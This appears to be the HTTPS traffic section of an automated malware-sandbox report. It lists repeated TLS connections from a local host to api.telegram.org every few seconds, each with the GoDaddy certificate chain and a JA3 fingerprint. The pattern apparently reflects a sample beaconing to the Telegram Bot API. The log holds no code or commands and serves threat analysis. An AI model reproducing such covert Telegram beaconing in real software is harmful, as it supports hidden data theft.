                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:40:32.172120094 CET149.154.167.220443192.168.2.749737CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:40:36.780297041 CET149.154.167.220443192.168.2.749744CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:40:42.199759960 CET149.154.167.220443192.168.2.749752CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:40:47.413180113 CET149.154.167.220443192.168.2.749753CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:40:52.801297903 CET149.154.167.220443192.168.2.749754CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:40:58.239384890 CET149.154.167.220443192.168.2.749755CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:41:03.753128052 CET149.154.167.220443192.168.2.749756CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:41:09.253482103 CET149.154.167.220443192.168.2.749757CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:41:14.850255013 CET149.154.167.220443192.168.2.749760CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:41:20.446326017 CET149.154.167.220443192.168.2.749761CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:41:31.024688005 CET149.154.167.220443192.168.2.749762CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:41:35.728291988 CET149.154.167.220443192.168.2.749764CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
